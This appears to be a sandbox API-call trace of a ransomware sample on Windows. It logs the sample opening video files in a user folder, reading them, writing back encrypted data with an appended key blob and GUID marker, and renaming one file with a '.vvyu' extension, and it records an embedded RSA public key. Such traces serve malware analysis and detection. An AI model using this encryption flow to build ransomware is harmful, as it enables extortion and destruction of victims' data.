[0195.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9f00 [0195.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9f48 [0195.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0195.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.759] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0195.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0195.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0195.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64e8 [0195.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae64d0 [0195.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0195.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0195.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.762] GetCurrentThreadId () returned 0x5d8 [0195.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8658 [0195.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.763] GetCurrentThreadId () returned 0x5d8 [0195.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0195.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0195.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64e8 [0195.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6548 [0195.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0195.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0195.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0195.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6560 [0195.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6500 [0195.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0195.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64d0 [0195.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0195.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0195.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0195.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0195.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0195.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0195.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9f48 | out: hHeap=0x2c0000) returned 1 [0195.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.774] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x6373, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x6373, lpOverlapped=0x0) returned 1 [0195.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.775] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6378, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.775] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0195.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0195.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.777] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0195.777] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.777] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.777] CloseHandle (hObject=0x584) returned 1 [0195.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0195.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.780] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\geIB4J_yYE XOIcR0.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\geib4j_yye xoicr0.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\geIB4J_yYE XOIcR0.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\geib4j_yye xoicr0.flv.vvyu")) returned 1 [0195.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.781] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.784] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26aaba10, ftCreationTime.dwHighDateTime=0x1d8a40e, ftLastAccessTime.dwLowDateTime=0x5ef23ba0, ftLastAccessTime.dwHighDateTime=0x1d8a5d5, ftLastWriteTime.dwLowDateTime=0x5ef23ba0, ftLastWriteTime.dwHighDateTime=0x1d8a5d5, nFileSizeHigh=0x0, nFileSizeLow=0xf974, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HI5Yoaj9.mp4", cAlternateFileName="")) returned 1 [0195.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.784] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\HI5Yoaj9.mp4") returned=".mp4" [0195.785] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\HI5Yoaj9.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\hi5yoaj9.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.785] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=63860) returned 1 [0195.785] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.789] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf94e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.789] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.791] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.791] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xf974, lpOverlapped=0x0) returned 1 [0195.792] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.792] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.792] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.792] 